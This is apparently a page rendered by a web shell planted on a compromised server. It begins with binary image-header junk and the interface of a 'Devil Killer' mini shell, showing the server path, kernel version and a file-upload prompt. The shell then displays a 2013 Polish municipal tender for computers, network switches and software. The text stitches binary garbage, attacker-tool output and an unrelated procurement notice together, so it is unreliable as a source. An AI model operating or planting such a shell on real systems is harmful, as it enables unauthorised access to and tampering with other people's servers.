JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131108/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131108/457642-N-2013.html

<p class="kh_header"><b>Kobierzyce: Dostawa sprzętu IT i oprogramowania z podziałem na 3 zadania:

Zadanie 1 - Dostawa zestawów komputerowych i urządzeń peryferyjnych
Zadanie 2 - Dostawa urządzeń sieciowych
Zadanie 3 - Dostawa oprogramowania</b><br>
<b>Numer ogłoszenia: 457642 - 2013; data zamieszczenia: 08.11.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Kobierzyce , al. Pałacowa 1, 55-040 Kobierzyce, woj. dolnośląskie, tel. 071 3111215, faks 071 3111252.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ugk.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa sprzętu IT i oprogramowania z podziałem na 3 zadania:

Zadanie 1 - Dostawa zestawów komputerowych i urządzeń peryferyjnych
Zadanie 2 - Dostawa urządzeń sieciowych
Zadanie 3 - Dostawa oprogramowania.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest: Dostawa sprzętu IT i oprogramowania z podziałem na trzy zadania:
1.1.	Zadanie 1 - Dostawa zestawów komputerowych i urządzeń peryferyjnych obejmuje:
a)	Dostarczenie 20 zestawów komputerowych klasy PC (stacji roboczych) spełniających wymagania określone w Załączniku nr 5 do SIWZ - Szczegółowy opis parametrów. 
b)	Dostarczenie 5 zestawów komputerowych klasy PC (stacji roboczych) spełniających wymagania określone w Załączniku nr 5 do SIWZ - Szczegółowy opis parametrów. 
c)	Dostarczenie 1 zestawu komputerowego mobilnego, spełniającego wymagania szczegółowo określone w Załączniku nr 5 do SIWZ - Szczegółowy opis parametrów. 
d)	Dostarczenie 3 laserowych drukarek sieciowych monochromatycznych spełniających wymagania szczegółowo określone w Załączniku nr 5 do SIWZ - Szczegółowy opis parametrów. 
e)	Dostarczenie 7 atramentowych urządzeń wielofunkcyjnych spełniających wymagania szczegółowo określone w Załączniku nr 5 do SIWZ - Szczegółowy opis parametrów. 
f)	Dostarczenie termotransferowej drukarki etykiet samoprzylepnych typu ZEBRA KG42t wraz z kompletem 5000 białych foliowych etykiet termotransferowych o rozmiarze pomiędzy 40x20 mm, a 51 x 25 mm, o dużej przyczepności do podłoża i trwałości kleju, wysokiej odporności na warunki środowiska (światło, ścieranie, różnice temperatur itp.), i wszelkich innych materiałów eksploatacyjnych niezbędnych do wydrukowania tych etykiet na dostarczonej drukarce - wymagania określone w Załączniku nr 5 do SIWZ - Szczegółowy opis parametrów. 
g)	Dostawa 2 czytników kodów prążkowych Motorolla LS2208 - - wymagania określone w Załączniku nr 5 do SIWZ - Szczegółowy opis parametrów.
h)	Dostawa 12 dysków twardych 3,5 SATA 3 klasy korporacyjnej - wymagania określone w Załączniku nr 5 do SIWZ - Szczegółowy opis parametrów.
1.2.	Zadanie 2 - Dostawa urządzeń sieciowych obejmuje:
a)	Dostarczenie 3 sztuk punktów dostępowych sieci bezprzewodowej - wymagania określone w Załączniku nr 5 do SIWZ - Szczegółowy opis parametrów.
b)	Dostarczenie przełącznika LAN sieciowego (switcha) 3COM 5500G EL-48 (kod  produktu 3COM: 3CR17251-91) wraz z kablem (kod produktu 3COM: 3C17262) potrzebnym do dodania tego urządzenia do eksploatowanego przez Zamawiającego stosu 3 tego typu przełączników (2 x 3CR17251-91 + 1 x 3CR17251-91) - wymagania określone w Załączniku nr 5 do SIWZ - Szczegółowy opis parametrów.  
1.3.	Zadanie 3 - Dostawa oprogramowania - wymagania określone w Załączniku nr 5 do SIWZ - Szczegółowy opis parametrów.
2.	Zamawiający informuje, iż wskazanie nazw zwyczajowych, czy producentów w zamieszczonych elementach opisu przedmiotu zamówienia służy wyłącznie określeniu minimalnych cech technicznych i jakościowych. W przypadkach opisanych powyżej jak również w Załączniku nr 5 do SIWZ Szczegółowy opis parametrów, Zamawiający wskazuje i wyjaśnia potrzebę użycia konkretnych nazw zwyczajowych, czy producentów, która podyktowana jest rozbudową istniejącej już infrastruktury i wykorzystywanego sprzętu IT.  
3.	Zamawiający dopuszcza możliwość przedstawienia w ofercie asortymentu równoważnego (innego niż podany z nazwy przez Zamawiającego), z wyłączeniem takiej możliwości dla pozycji 1.1.f, 1.1.g oraz dla oprogramowania IB Expert i jej znacznym ograniczeniem dla pozycji 1.2.b,   pod warunkiem, iż oferowany asortyment będzie o takich samych lub lepszych parametrach technicznych, jakościowych, funkcjonalnych oraz użytkowych. Wykonawca, który powołuje się na rozwiązania równoważne opisywanym przez zamawiającego, jest obowiązany wykazać, że oferowane przez niego dostawy, spełniają wymagania określone przez Zamawiającego..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 30.21.30.00-5, 30.23.21.10-8, 30.23.21.50-0, 30.23.20.00-4, 30.21.61.30-6, 30.23.31.32-5, 48.00.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 21.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nd</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie powyższego warunku Zamawiający uzna posiadanie opłaconej polisy, a w przypadku jej braku innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie produktów, które mają zostać dostarczone, których autentyczność musi zostać poświadczona przez wykonawcę na żądanie zamawiającego;</li>

<li style="margin-bottom: 12px;">zaświadczenie niezależnego podmiotu uprawnionego do kontroli jakości potwierdzającego, że dostarczane produkty odpowiadają określonym normom lub specyfikacjom technicznym;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>W celu potwierdzenia, że oferowane dostawy odpowiadają wymaganiom określonym przez Zamawiającego, Wykonawca winien załączyć do oferty przetargowej  następujące dokumenty dla poszczególnych części zamówienia:
Zadanie 1 - Dostawa zestawów komputerowych i urządzeń peryferyjnych.
Dla zestawu komputerowego Typu 1 Oferent, dla uściślenia opisu przedmiotu oferty, powinien podać: 
nazwę producentów jednostki centralnej i monitora
dokładną nazwę oferowanych modeli jednostki centralnej i monitora 
model procesora, w który wyposażona zostanie oferowana jednostka centralna,
ilość i rodzaj pamięci RAM jednostki centralnej
rodzaj zastosowanej w oferowanym modelu karty graficznej
dodatkowe informacje o cechach tych urządzeń pozwalające na weryfikację parametrów opisanych w Załączniku nr 5 do SIWZ  
Oferta i dostarczona z nią lub publicznie dostępna (w Internecie, w miejscach wskazanych w ofercie), dokumentacja musi być wystarczająca do oceny posiadania przez oferowane urządzenia cech i parametrów określonych w Załączniku 5 do SIWZ.

Wraz z ofertą dla zestawu komputerowego typ 1. Oferent musi dostarczyć
1.	Wyniki testów jednostki centralnej przeprowadzonych oprogramowaniem BAPCO Sysmark 2012 
2.	Wydruk ze strony Windows Logod Products List na platformę systemową Windows 7x 64 bit i Windows 8 x64 dla oferowanej jednostki centralnej -wydruk potwierdzający kompatybilność sprzętu z dostarczanym systemem operacyjnym.
3.	Raport badawczy wystawiony przez niezależną  akredytowaną jednostkę potwierdzający spełnienie wymagania odnośnie głośności jednostki centralnej 
4.	Certyfikat ISO9001 dla sprzętu 
5.	Deklaracje zgodności CE dla sprzętu
6.	Potwierdzenie spełnienia przez jednostkę centralną kryteriów środowiskowych, w tym zgodności z dyrektywą RoHS Unii Europejskiej o eliminacji substancji niebezpiecznych w postaci oświadczenia producenta jednostki (wg wytycznych Krajowej Agencji Poszanowania Energii S.A., zawartych w dokumencie Opracowanie propozycji kryteriów środowiskowych dla produktów zużywających energię możliwych do wykorzystania przy formułowaniu specyfikacji na potrzeby zamówień publicznych, pkt. 3.4.2.1; dokument z grudnia 2006), w szczególności zgodności z normą ISO 1043-4 dla płyty głównej oraz elementów wykonanych z tworzyw sztucznych o masie powyżej 25 gram
7.	Dowód spełniania przez oferowany komputer wymogów normy Energy Star 5.0 i jego wpisania do internetowego katalogu www.eu-energystar.org lub www.energystar.gov - dopuszcza się wydruk ze strony internetowej
8.	Certyfikat TCO (TCO 6.0 lub TCO 5.0 lub TCO 03 ) dla oferowanego modelu monitora 
9.	Dowód spełniania przez oferowany monitor wymogów normy Energy Star 5.0 lub nowszej
10.	Oświadczenie podmiotu realizującego serwis lub producenta sprzętu o spełnieniu warunku wykonywania usług gwarancyjnych  bez zabierania od Zamawiajacego dysków twardych (również gdy sam dysk jest niesprawny)
11.	Oświadczenie producenta potwierdzające, że serwis gwarancyjny będzie realizowany przez autoryzowanego partnera serwisowego producenta lub bezpośrednio przez producenta. W pierwszym przypadku (serwis świadczony przez autoryzowanego partnera) wymagane będzie dodatkowo dostarczenie:
Certyfikatu ISO 9001:2000 na świadczenie usług serwisowych firmy świadczącej usługi serwisu gwarancyjnego
Dowodu posiadania przez firmę serwisującą autoryzacji producenta komputera
12.	Oświadczenie producenta, że w przypadku nie wywiązywania się z obowiązków gwarancyjnych oferenta lub firmy serwisującej, przejmie na siebie wszelkie zobowiązania związane z serwisem.
W przypadku oferowania monitora innego producenta niż producent jednostki centralnej dokumenty 4,5,10,11 i 12 należy dostarczyć zarówno dla jednostki centralnej jak i monitora.

Dla zestawu komputerowego typ 2 nie ma potrzeby dostarczania odrębnych dokumentów dla jednostki centralnej (jest taka sama jak w zestawie Typ 1 - różni się tylko ilością pamięci operacyjnej). Dla monitora analogicznie jak w przypadku monitora do zestawu nr 1 należy dostarczyć z ofertą:
1.	Certyfikat ISO9001 dla sprzętu 
2.	Deklaracje zgodności CE dla sprzętu
3.	Certyfikat TCO (TCO 6.0 lub TCO 5.0 lub TCO 03 ) dla oferowanego modelu monitora 
4.	Dowód spełniania przez oferowany monitor wymogów normy Energy Star 5.0 lub nowszej
5.	Oświadczenie podmiotu realizującego serwis lub producenta sprzętu o spełnieniu warunku wykonywania usług gwarancyjnych  bez zabierania od Zamawiającego dysków twardych (również gdy sam dysk jest niesprawny)
6.	Oświadczenie producenta potwierdzające, że serwis gwarancyjny monitora będzie realizowany przez autoryzowanego partnera serwisowego producenta lub bezpośrednio przez producenta. W pierwszym przypadku (serwis świadczony przez autoryzowanego partnera) wymagane będzie dodatkowo dostarczenie:
Certyfikatu ISO 9001:2000 na świadczenie usług serwisowych firmy świadczącej usługi serwisu gwarancyjnego
Dowodu posiadania przez firmę serwisującą autoryzacji producenta komputera
7.	Oświadczenie producenta, że w przypadku nie wywiązywania się z obowiązków gwarancyjnych oferenta lub firmy serwisującej, przejmie na siebie wszelkie zobowiązania związane z serwisem.

Dla zestawu komputerowego mobilnego Oferent, dla uściślenia opisu przedmiotu oferty, powinien podać: 
nazwę producenta 
dokładną nazwę oferowanego modelu 
model procesora, w który wyposażony zostanie oferowany model komputera,
ilość i rodzaj pamięci RAM jednostki centralnej
rodzaj zastosowanej w oferowanym modelu karty graficznej
dodatkowe informacje o cechach oferowanego modelu komputera pozwalające na weryfikację parametrów opisanych w Załączniku nr 5 do SIWZ  
Oferta i dostarczona z nią lub publicznie dostępna (w Internecie, w miejscach wskazanych w ofercie), dokumentacja musi być wystarczająca do oceny posiadania przez oferowane urządzenia  cech i parametrów określonych w Załączniku 5 do SIWZ.

Wraz z ofertą dla zestawu komputerowego mobilnego. Oferent musi dostarczyć
1.	Wyniki testów oferowanego modelu komputera przeprowadzonych oprogramowaniem BAPCO Mobilemark 2007 
2.	Raport badawczy wystawiony przez niezależną  akredytowaną jednostkę potwierdzający spełnienie wymagania odnośnie głośności jednostki centralnej 
3.	Certyfikat ISO9001 dla sprzętu 
4.	Certyfikat ISO 14001 dla sprzętu
5.	Deklaracje zgodności CE dla sprzętu
6.	Wydruk ze strony Windows Logod Products List na platformę systemową Windows 7 x64 bit i Windows 8 x64 dla oferowanego modelu komputera -wydruk potwierdzający kompatybilność sprzętu z dostarczanym systemem operacyjnym.
7.	Dowód spełniania przez oferowany komputer wymogów normy Energy Star 5.0 i jego wpisania do internetowego katalogu www.eu-energystar.org lub www.energystar.gov - dopuszcza się wydruk ze strony internetowej
8.	Oświadczenie podmiotu realizującego serwis lub producenta sprzętu o spełnieniu warunku wykonywania usług gwarancyjnych  bez zabierania od Zamawiającego dysków twardych (również gdy sam dysk jest niesprawny)
9.	Oświadczenie producenta potwierdzające, że serwis gwarancyjny będzie realizowany przez autoryzowanego partnera serwisowego producenta lub bezpośrednio przez producenta. W pierwszym przypadku (serwis świadczony przez autoryzowanego partnera) wymagane będzie dodatkowo dostarczenie:
Certyfikatu ISO 9001:2000 na świadczenie usług serwisowych firmy świadczącej usługi serwisu gwarancyjnego
Dowodu posiadania przez firmę serwisującą autoryzacji producenta komputera

Zadanie 2 - Dostawa urządzeń sieciowych

Dla oferowanych urządzeń Oferent, dla uściślenia opisu przedmiotu oferty, powinien podać: 
nazwę producenta 
dokładną nazwę oferowanego modelu
W przypadku oferowania produktu HP zamiast oryginalnego przełącznika 3COM (kod  produktu 3COM: 3CR17251-91) należy dostarczyć oświadczenie producenta (HP) potwierdzające, że oferowany przełącznik (należy podać dokładne, jednoznaczne oznaczenie oferowanego modelu)  będzie mógł być dołączony do stosu posiadanych przez Zamawiającego przełączników 3COM i będzie poprawnie pracował w takiej konfiguracji 

Zadanie 3 - Dostawa oprogramowania
Dla oferowanego oprogramowania Oferent powinien wskazać opis pozwalający na weryfikację parametrów opisanych w Załączniku nr 5 do SIWZ.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Istotne dla Stron postanowienia określa projekt umowy stanowiący załącznik do niniejszej Specyfikacji.
2.	Ustala się następujące okoliczności, które mogą powodować konieczność wprowadzenia zmian w treści zawartej umowy:
a)	zmiana terminu realizacji zamówienia z  przyczyn nie leżących po stronie Wykonawcy,           
b)	zmiana nazwy, siedziby stron umowy, numerów kont bankowych, osób do kontaktów pomiędzy stronami umowy oraz innych danych identyfikacyjnych,
c)	w zakresie podwykonawstwa za uprzednią zgodą zamawiającego: - powierzenie podwykonawcom innej część zamówienia niż wskazana w ofercie wykonawcy.
d)	zmniejszenie zakresu wynagrodzenia z przyczyn o obiektywnym charakterze, w wyniku istotnej zmiany okoliczności powodującej, że wykonanie części zakresu realizacji umowy nie leży w interesie publicznym.
3.	Zamawiający nie wymaga wpłacenia zabezpieczenia należytego wykonania umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ugk.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Kobierzyce, Al. Pałacowa 1. 55-040 Kobierzyce pokój 50.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.11.2013 godzina 11:00, miejsce: Urząd Gminy Kobierzyce, Al. Pałacowa 1. 55-040 Kobierzyce pokój 25.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nd.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
